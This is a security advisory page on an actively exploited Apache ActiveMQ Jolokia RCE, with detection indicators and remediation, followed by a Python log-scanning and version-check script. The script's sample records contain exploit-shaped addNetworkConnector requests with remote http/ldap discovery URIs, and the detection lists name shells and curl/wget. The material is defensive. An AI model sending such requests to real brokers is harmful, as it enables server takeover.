[{"data":1,"prerenderedAt":139},["ShallowReactive",2],{"article-slug-critical-rce-vulnerability-in-apache-activemq-under-active-exploitation":3,"articles-index":-1},{"id":4,"slug":5,"headline":6,"title":7,"summary":8,"full_report":9,"twitter_post":10,"meta_description":11,"category":12,"severity":16,"entities":17,"cves":31,"sources":37,"events":61,"mitre_techniques":62,"mitre_mitigations":75,"d3fend_countermeasures":106,"iocs":107,"cyber_observables":108,"tags":124,"extract_datetime":130,"article_type":131,"impact_scope":132,"pub_date":41,"reading_time_minutes":138,"createdAt":130,"updatedAt":130},"10a6df2b-c9c3-4823-8915-f77d25809ec7","critical-rce-vulnerability-in-apache-activemq-under-active-exploitation","Critical 13-Year-Old RCE Flaw in Apache ActiveMQ (CVE-2026-34197) Actively Exploited","Unauthenticated RCE Possible in Apache ActiveMQ by Chaining New and Old Vulnerabilities","A critical remote code execution (RCE) vulnerability, CVE-2026-34197, has been discovered in Apache ActiveMQ Classic and is under active exploitation. The flaw, which has reportedly existed for 13 years, allows an authenticated attacker to execute arbitrary code by abusing the Jolokia JMX-HTTP bridge. The risk is severely amplified as this flaw can be chained with a separate vulnerability, CVE-2024-32114, which removes authentication requirements from the API endpoint, allowing for unauthenticated RCE. Apache has released patches, and administrators are urged to update immediately to versions 6.2.3 or 5.19.4 to prevent system compromise.","## Executive Summary\nSecurity researchers have disclosed a **critical** remote code execution (RCE) vulnerability, **[CVE-2026-34197](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEACTIVEMQ-3142244)**, in **[Apache ActiveMQ](https://activemq.apache.org/)** Classic, a popular open-source message broker. The vulnerability, which has been latent in the codebase for 13 years, is being actively exploited in the wild. 
The flaw resides in the Jolokia JMX-HTTP bridge and allows an authenticated attacker to achieve RCE. The threat is magnified because it can be chained with **CVE-2024-32114**, a default-configuration flaw in 6.0.0 through 6.1.1 that leaves the same endpoint completely unauthenticated. On those versions the combination allows unauthenticated RCE and full system compromise. The Apache Software Foundation has released patches, and immediate action is required.\n\n## Vulnerability Details\n- **CVE-2026-34197:** This is an improper input validation vulnerability. An attacker holding credentials accepted by the broker's web layer can send a specially crafted request to the `addNetworkConnector()` operation of the broker MBean via the Jolokia API endpoint (`/api/jolokia/`). The operation takes a discovery address (a URI); by supplying a malicious discovery URI, the attacker can trick the ActiveMQ broker into loading a remote Spring XML application context, which executes arbitrary Java code within the ActiveMQ process. Because the broker itself fetches that remote context, a successful attempt is visible as an outbound connection from the broker JVM to a host it has no business contacting.\n\n- **CVE-2024-32114:** This vulnerability, affecting ActiveMQ versions 6.0.0 through 6.1.1, is a default configuration that applies no security constraint to the `/api/*` web context, where the Jolokia JMX-HTTP bridge and the message REST API are served. The practical effect is that the entire Jolokia API, including the vulnerable `addNetworkConnector()` operation, is reachable without any authentication.\n\n> The chaining of these two vulnerabilities is what makes this threat so severe. On 6.0.0 through 6.1.1 an attacker needs no prior access or credentials to achieve full remote code execution on an internet-facing ActiveMQ server; on every other affected version a single set of valid web-console credentials is enough.\n\n## Affected Systems\n- **CVE-2026-34197** affects all versions of Apache ActiveMQ Classic prior to **5.19.4** and versions **6.0.0** through **6.2.2**.\n- The unauthenticated exploit chain is possible only on versions **6.0.0** through **6.1.1**, the releases where both vulnerabilities are present.\n\n## Exploitation Status\nMultiple security firms, including **[Horizon3.ai](https://horizon3.ai/)** and **[SentinelOne](https://www.sentinelone.com/)**, have confirmed that **CVE-2026-34197** is being actively exploited in the wild. 
Proof-of-concept (PoC) exploit code is publicly available, lowering the bar for attackers to weaponize this vulnerability.\n\n## Impact Assessment\nSuccessful exploitation of this vulnerability chain results in a complete compromise of the ActiveMQ server. An attacker can:\n- Execute arbitrary commands with the privileges of the ActiveMQ service account.\n- Steal or manipulate all data passing through the message broker.\n- Use the compromised server as a pivot point to attack other systems within the internal network.\n- Deploy ransomware or other malware.\n\nGiven that ActiveMQ is often used as a central messaging backbone for enterprise applications, a compromise could have devastating and widespread consequences.\n\n## Cyber Observables for Detection\nSecurity teams should hunt for evidence of exploitation in their logs:\n\n| Type | Value | Description | Context | Confidence |\n|---|---|---|---|---|\n| `url_pattern` | `/api/jolokia/` | Any access to this URL path should be scrutinized. Patching does not remove the endpoint: on a correctly configured system it requires authentication and is reachable only from administrative hosts, so any request from an untrusted source is suspect. Normalize case and URL-encoding before matching, since Jolokia also accepts the operation in the GET URL path. | Web server access logs, WAF logs, Reverse proxy logs | high |\n| `string_pattern` | `addNetworkConnector` | The presence of this string in the POST body or URL path of a Jolokia request is a strong indicator of an exploitation attempt. | WAF logs, Application-level logging with request-body inspection | high |\n| `string_pattern` | `discoveryURI` | A discovery URI carrying a remote-loading scheme such as `http://` or `ldap://` in a Jolokia request is highly suspicious; legitimate network connectors use broker transport URIs such as `tcp://`, `static:` or `multicast:`. | WAF logs, Application-level logging | high |\n| `process_name` | `java` | Monitor for the ActiveMQ JVM spawning shells (`sh`, `bash`, `cmd.exe`) or network tools (`curl`, `wget`), and for the JVM itself opening outbound HTTP or LDAP connections to unfamiliar hosts (the fetch of the remote Spring XML context). | EDR logs, Host-based monitoring (Sysmon Event ID 1 for process creation, Event ID 3 for network connections) | high |\n\n## Detection Methods\n1.  **Vulnerability Scanning:** Use a vulnerability scanner to identify all instances of Apache ActiveMQ in your environment and check whether they run a vulnerable version (any release before 5.19.4, or 6.0.0 through 6.2.2); treat 6.0.0 through 6.1.1 as the highest priority because the chain needs no credentials there.\n2.  **Log Analysis:** Ingest ActiveMQ and web server logs into a SIEM. Create alerts for any access to the `/api/jolokia/` endpoint, and a high-severity alert when the request body or URL path contains `addNetworkConnector` or a discovery URI with an `http://` or `ldap://` scheme. Plain access logs do not record POST bodies, so this rule needs WAF or reverse-proxy logging with body capture.\n3.  **Network Traffic Analysis:** Monitor network traffic for outbound connections from ActiveMQ servers to unexpected IP addresses. The broker fetching the remote Spring XML context is the first outbound connection of a successful attempt; a reverse shell or data exfiltration follows.\n4.  **D3FEND Techniques:** Implement **[D3-NTA: Network Traffic Analysis](https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis)** to detect the anomalous network connections resulting from a successful RCE. Use **[D3-PA: Process Analysis](https://d3fend.mitre.org/technique/d3f:ProcessAnalysis)** on the host to detect when the Java process spawns unexpected child processes like a shell.\n\n## Remediation Steps\n1.  **Patch Immediately:** The primary remediation is to upgrade to a patched version. The Apache Software Foundation has released:\n    - **ActiveMQ 6.2.3**\n    - **ActiveMQ 5.19.4**\n2.  **Workaround (If Patching is Delayed):** If immediate patching is not possible, restrict access to the ActiveMQ web console and its `/api/*` context. Ensure that they are not exposed to the public internet; limit access to trusted administrative hosts via firewall rules. Additionally, disable the Jolokia agent (`jolokia-agent`) in the configuration if it is not explicitly needed. A workaround reduces exposure but does not remove the flaw: any principal who can reach the endpoint with valid credentials can still exploit it.\n3.  **Verification:** After patching, confirm that the broker reports 5.19.4 or 6.2.3 (or later), that `/api/jolokia/` rejects unauthenticated requests, that it is not reachable from untrusted networks, and that the application functions as expected. The endpoint itself remains available to authenticated administrators; the fix is in the input validation behind it.","🚨 CRITICAL PATCH NOW: A 13-year-old RCE flaw in Apache ActiveMQ (CVE-2026-34197) is actively exploited. It can be chained for unauthenticated RCE. Update to versions 6.2.3 or 5.19.4 immediately. 
#Apache #ActiveMQ #RCE #CyberSecurity","A critical, 13-year-old remote code execution vulnerability (CVE-2026-34197) in Apache ActiveMQ is being actively exploited, allowing for unauthenticated RCE when chained. Patch immediately.",[13,14,15],"Vulnerability","Patch Management","Cyberattack","critical",[18,21,25,27],{"name":19,"type":20},"Apache Software Foundation","security_organization",{"name":22,"type":23,"url":24},"Apache ActiveMQ","product","https://activemq.apache.org/",{"name":26,"type":20},"Horizon3.ai",{"name":28,"type":29,"url":30},"SentinelOne","vendor","https://www.sentinelone.com/",[32,34],{"id":33,"severity":16},"CVE-2026-34197",{"id":35,"severity":36},"CVE-2024-32114","high",[38,43,46,50,54,57],{"url":39,"title":40,"date":41,"friendly_name":42},"https://www.csa.gov.sg/alerts-advisories/alerts/2026/al-2026-041","Critical Vulnerability in Apache ActiveMQ Classic","2026-04-13","Cyber Security Agency of Singapore",{"url":44,"title":45,"date":41,"friendly_name":26},"https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/","CVE-2026-34197: Apache ActiveMQ RCE via Jolokia API",{"url":47,"title":48,"date":41,"friendly_name":49},"https://www.securityweek.com/rce-bug-lurked-in-apache-activemq-classic-for-13-years/","RCE Bug Lurked in Apache ActiveMQ Classic for 13 Years","SecurityWeek",{"url":51,"title":52,"date":41,"friendly_name":53},"https://snyk.io/vuln/SNYK-JAVA-ORGAPACHEACTIVEMQ-3142244","CVE-2026-34197 - Remote Code Execution in Apache Activemq","Snyk",{"url":55,"title":56,"date":41,"friendly_name":28},"https://www.sentinelone.com/labs/cve-2026-34197-apache-activemq-rce-vulnerability/","CVE-2026-34197: Apache ActiveMQ RCE Vulnerability",{"url":58,"title":59,"date":41,"friendly_name":60},"https://dbugs.org/cve-2026-34197-remote-code-execution-in-apache-activemq/","CVE-2026-34197 — Remote Code Execution in Apache Activemq","dbugs",[],[63,67,71],{"id":64,"name":65,"tactic":66},"T1190","Exploit Public-Facing 
Application","Initial Access",{"id":68,"name":69,"tactic":70},"T1059","Command and Scripting Interpreter","Execution",{"id":72,"name":73,"tactic":74},"T1210","Exploitation of Remote Services","Lateral Movement",[76,85,89],{"id":77,"name":78,"d3fend_techniques":79,"description":84},"M1051","Update Software",[80],{"id":81,"name":82,"url":83},"D3-SU","Software Update","https://d3fend.mitre.org/technique/d3f:SoftwareUpdate","The primary mitigation is to apply the security patches provided by Apache immediately.",{"id":86,"name":87,"description":88},"M1035","Limit Access to Resource Over Network","As a temporary measure, restrict network access to the ActiveMQ web console and API endpoints, ensuring they are not exposed to the internet.",{"id":90,"name":91,"d3fend_techniques":92,"description":105},"M1042","Disable or Remove Feature or Program",[93,97,101],{"id":94,"name":95,"url":96},"D3-ACH","Application Configuration Hardening","https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening",{"id":98,"name":99,"url":100},"D3-EDL","Executable Denylisting","https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting",{"id":102,"name":103,"url":104},"D3-SCF","System Call Filtering","https://d3fend.mitre.org/technique/d3f:SystemCallFiltering","If the Jolokia agent is not needed for monitoring, disable it in the ActiveMQ configuration to remove the attack surface.",[],[],[109,114,119],{"type":110,"value":111,"description":112,"context":113,"confidence":36},"url_pattern","/api/jolokia/","Access to the Jolokia API endpoint. 
On a properly secured system, this should not be publicly exposed.","Web server access logs, Reverse proxy logs, WAF logs",{"type":115,"value":116,"description":117,"context":118,"confidence":36},"string_pattern","addNetworkConnector","The presence of this string in a POST request to the Jolokia endpoint is a strong indicator of an exploitation attempt.","WAF logs, Application-level logging with POST body inspection",{"type":120,"value":121,"description":122,"context":123,"confidence":36},"process_name","java","Monitor for the ActiveMQ Java process spawning unexpected child processes like sh, bash, cmd.exe, curl, or wget.","EDR logs, Sysmon Event ID 1",[125,126,127,128,129,33],"RCE","Apache","ActiveMQ","Jolokia","zero-day","2026-04-13T15:00:00.000Z","Advisory",{"geographic_scope":133,"industries_affected":134},"global",[135,136,137],"Technology","Finance","Telecommunications",5,1776260622960]
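The version triage (Affected Systems, Detection Methods step 1) and the log hunt (Cyber Observables, Detection Methods step 2) in the advisory above can be automated. The following Python script is an added example written for this page; it is not code from the advisory, its cited sources, or the ActiveMQ project. It assumes a JSON-lines web or WAF log with `ts`, `src`, `method`, `path` and `body` fields (a constructed format; map the names to your own export), extends the advisory's `http://` and `ldap://` list with the TLS variants as an assumption, and embeds a few constructed sample records using documentation addresses rather than real traffic.

```python
"""Triage helper for the ActiveMQ advisory above (CVE-2026-34197 chained with
CVE-2024-32114). Added example for this page; not code from the advisory, its
sources, or the ActiveMQ project. Two steps the advisory leaves manual:
  1. classify_version(): compare a broker version string with the affected
     ranges it lists (fixed in 5.19.4 and 6.2.3; CVE-2024-32114 in 6.0.0-6.1.1);
  2. scan_log(): flag web/WAF log records for its observables (/api/jolokia/
     access, addNetworkConnector, a discovery URI with http:// or ldap://).
Record field names (ts, src, method, path, body) are an assumption made for
the example; map them to your own proxy or WAF export.
"""
import json
import re
from urllib.parse import unquote

FIXED_5X = (5, 19, 4)                  # first fixed 5.x release per the advisory
FIXED_6X = (6, 2, 3)                   # first fixed 6.x release per the advisory
UNAUTH_RANGE = ((6, 0, 0), (6, 1, 1))  # CVE-2024-32114: /api/* open by default

_VERSION = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)")
# Match after URL-decoding and case-folding so /API/jolokia%2Fexec is not
# missed by a naive substring check on the raw path.
_JOLOKIA_PATH = re.compile(r"^/api/jolokia(?:/|$)", re.IGNORECASE)
# Legitimate network-connector URIs use tcp://, static:(...), multicast:// etc.
# The advisory names http:// and ldap://; the TLS variants are an assumption
# added here because they lead to the same remote fetch.
_REMOTE_SCHEME = re.compile(r"\b(?:https?|ldaps?)://", re.IGNORECASE)


def parse_version(version):
    """'6.1.1', '6.1.1.redhat-00001' or '5.18.3 ' -> (major, minor, patch)."""
    m = _VERSION.match(version)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {version!r}")
    return tuple(int(x) for x in m.groups())


def classify_version(version):
    """Return (vulnerable_to_cve_2026_34197, unauthenticated_chain_possible).

    Major lines the advisory does not mention are reported as not vulnerable;
    extend the ranges rather than trust that for other product lines.
    """
    v = parse_version(version)
    vulnerable = (v[0] <= 5 and v < FIXED_5X) or (v[0] == 6 and v < FIXED_6X)
    unauth = vulnerable and UNAUTH_RANGE[0] <= v <= UNAUTH_RANGE[1]
    return vulnerable, unauth


def scan_record(rec):
    """Return the advisory indicators matched by one log record (a dict)."""
    path = unquote(str(rec.get("path") or ""))
    body = unquote(str(rec.get("body") or ""))
    if not _JOLOKIA_PATH.match(path):
        return []                       # not the Jolokia endpoint: nothing to say
    hits = ["jolokia_endpoint_access"]  # review: must be authenticated, admin-only
    # Jolokia takes the operation either in a POST JSON body or in a GET path
    # (/exec/<mbean>/<operation>/<args>), so inspect both together.
    request = path + "\n" + body
    if "addnetworkconnector" in request.lower():
        hits.append("addNetworkConnector_operation")
    if _REMOTE_SCHEME.search(request):
        hits.append("remote_scheme_in_connector_uri")
    return hits


def scan_log(lines):
    """Scan JSON-lines records; return (findings, count of unparseable lines)."""
    findings, skipped = [], 0
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except ValueError:
            rec = None
        if not isinstance(rec, dict):
            skipped += 1                # never let one bad line abort the hunt
            continue
        hits = scan_record(rec)
        if hits:
            # Anything beyond bare endpoint access is an exploitation attempt.
            severity = "critical" if len(hits) > 1 else "review"
            findings.append({"src": rec.get("src"), "path": rec.get("path"),
                             "severity": severity, "indicators": hits})
    return findings, skipped


# Constructed sample records (documentation addresses, not real traffic):
# a POST exec call, a benign authenticated read, the same exec call hidden in
# an upper-cased URL-encoded GET path, an unrelated page, and a malformed line.
SAMPLE_LOG = r'''
{"ts":"2026-04-13T15:02:11Z","src":"203.0.113.45","method":"POST","path":"/api/jolokia/","body":"{\"type\":\"exec\",\"mbean\":\"org.apache.activemq:type=Broker,brokerName=localhost\",\"operation\":\"addNetworkConnector\",\"arguments\":[\"http://198.51.100.7/\"]}"}
{"ts":"2026-04-13T15:02:40Z","src":"10.0.0.5","method":"GET","path":"/api/jolokia/read/java.lang:type=Memory","body":""}
{"ts":"2026-04-13T15:03:02Z","src":"203.0.113.45","method":"GET","path":"/API/jolokia%2Fexec/org.apache.activemq:type=Broker,brokerName=localhost/addNetworkConnector/ldap%3A%2F%2F198.51.100.7%2Fx","body":""}
{"ts":"2026-04-13T15:03:30Z","src":"10.0.0.9","method":"GET","path":"/admin/queues.jsp","body":""}
this line is not JSON and must not abort the scan
'''

if __name__ == "__main__":
    for ver in ("5.18.3", "5.19.4", "6.1.1", "6.1.2", "6.2.3"):
        print(ver, classify_version(ver))
    findings, skipped = scan_log(SAMPLE_LOG.splitlines())
    for f in findings:
        print(f["severity"], f["src"], f["indicators"])
    print(f"{len(findings)} finding(s), {skipped} unparseable line(s)")
```

Run it directly to see the classification of each version and the findings for the sample records; in a SIEM you would feed `scan_record` each proxy or WAF event and page on `critical`. The benign read from an internal host still produces a `review` finding on purpose, because the advisory's first observable is any access to the endpoint at all; the two hostile records are caught even though the second hides the operation in an upper-cased, percent-encoded GET path that a raw substring rule on `/api/jolokia/` would miss.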